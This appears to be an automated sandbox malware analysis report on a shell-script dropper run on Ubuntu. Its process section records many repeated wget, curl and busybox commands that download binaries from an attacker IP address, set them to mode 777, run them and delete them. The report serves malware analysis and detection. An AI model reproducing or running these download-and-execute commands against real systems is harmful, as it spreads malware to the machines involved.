Malware Analysis Report

2024-11-13 17:43

Sample ID 241110-bgn8fswdlr
Target 28da49fd9438da5ee3fa13fc53b5bd0c.bin
SHA256 91a1cdf18ca033207485813299cb0053f10c91d27700516e02d39d28ff0a47de
Tags
defense_evasion antivm discovery
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

91a1cdf18ca033207485813299cb0053f10c91d27700516e02d39d28ff0a47de

Threat Level: Shows suspicious behavior

The file 28da49fd9438da5ee3fa13fc53b5bd0c.bin was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion antivm discovery

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

Reads runtime system information

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 01:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 01:07

Reported

2024-11-10 01:09

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

41s

Max time network

131s

Command Line

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM N/A
N/A /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C N/A
N/A /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs N/A
N/A /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE N/A
N/A /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe N/A
N/A /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw N/A
N/A /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp N/A
N/A /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK N/A
N/A /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy N/A
N/A /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X N/A
N/A /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR N/A
N/A /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b N/A
N/A /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w N/A
N/A /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy /usr/bin/curl N/A
File opened for modification /tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR /usr/bin/curl N/A
File opened for modification /tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X /usr/bin/curl N/A
File opened for modification /tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda /usr/bin/curl N/A
File opened for modification /tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM /usr/bin/curl N/A
File opened for modification /tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b /usr/bin/curl N/A
File opened for modification /tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp /usr/bin/curl N/A
File opened for modification /tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK /usr/bin/curl N/A
File opened for modification /tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe /usr/bin/curl N/A
File opened for modification /tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w /usr/bin/curl N/A

Processes

/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh

[/tmp/183a2ccc798f2b45c7dd21be4a9866112342cb9428136cb6ff80a522965dbf1d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/wget

[wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/chmod

[chmod 777 xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/tmp/xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda

[./xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/bin/rm

[rm xG15jHBYjkoZj1q1BtTQEKqFzGftIzxbda]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/chmod

[chmod 777 rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/tmp/rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM

[./rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/bin/rm

[rm rqDTOyoOTDw6CYa3VSjvqIVVv1XxLtWgXM]

/usr/bin/wget

[wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/chmod

[chmod 777 T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/tmp/T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C

[./T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/bin/rm

[rm T6v9Isv8Fay0afdMpi2LS20SdrJDj2jB6C]

/usr/bin/wget

[wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/chmod

[chmod 777 DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/tmp/DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs

[./DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/bin/rm

[rm DBZ5fZqNlzj62ElsM4U5dYHEJo5o7y1gPs]

/usr/bin/wget

[wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/chmod

[chmod 777 LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/tmp/LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE

[./LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/bin/rm

[rm LwTLgBvuPu9PP9KUOsHPQtFhGVHNZoqmyE]

/usr/bin/wget

[wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/chmod

[chmod 777 ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/tmp/ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe

[./ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/bin/rm

[rm ot2VlMl0fRXkrXhhzQIRM0DE8b5lUbSiBe]

/usr/bin/wget

[wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/chmod

[chmod 777 giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/tmp/giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw

[./giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/bin/rm

[rm giGRcyu57Rl2Zclb9c8TaNBO8BooAcR3Mw]

/usr/bin/wget

[wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/chmod

[chmod 777 KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/tmp/KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp

[./KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/bin/rm

[rm KTLJ9iFnx6e7m0upCXVNavnRKEy4d2cMDp]

/usr/bin/wget

[wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/chmod

[chmod 777 EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/tmp/EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK

[./EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/bin/rm

[rm EDR1UpbD39KCMKH1vRgdxdHTl739rpD4YK]

/usr/bin/wget

[wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/chmod

[chmod 777 FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/tmp/FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy

[./FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/bin/rm

[rm FRa1rMvx2GvtXpSktMJMWFNDDvk6W53Rcy]

/usr/bin/wget

[wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/chmod

[chmod 777 KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/tmp/KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X

[./KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/bin/rm

[rm KIOro4DDuJmBdyMXJ8vtHKRisH5E5Tuq0X]

/usr/bin/wget

[wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/chmod

[chmod 777 hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/tmp/hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR

[./hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/bin/rm

[rm hn4vOKypY6CKycB9z93vRm66FOX5QZAMmR]

/usr/bin/wget

[wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/chmod

[chmod 777 rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/tmp/rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b

[./rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/bin/rm

[rm rcttK60M9CwdsnJdZsIhfpnWuo7r7f8e7b]

/usr/bin/wget

[wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/chmod

[chmod 777 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/tmp/6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w

[./6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

/bin/rm

[rm 6WeXHcQSOLchsytoMHLEOSJYav6Xabuh5w]

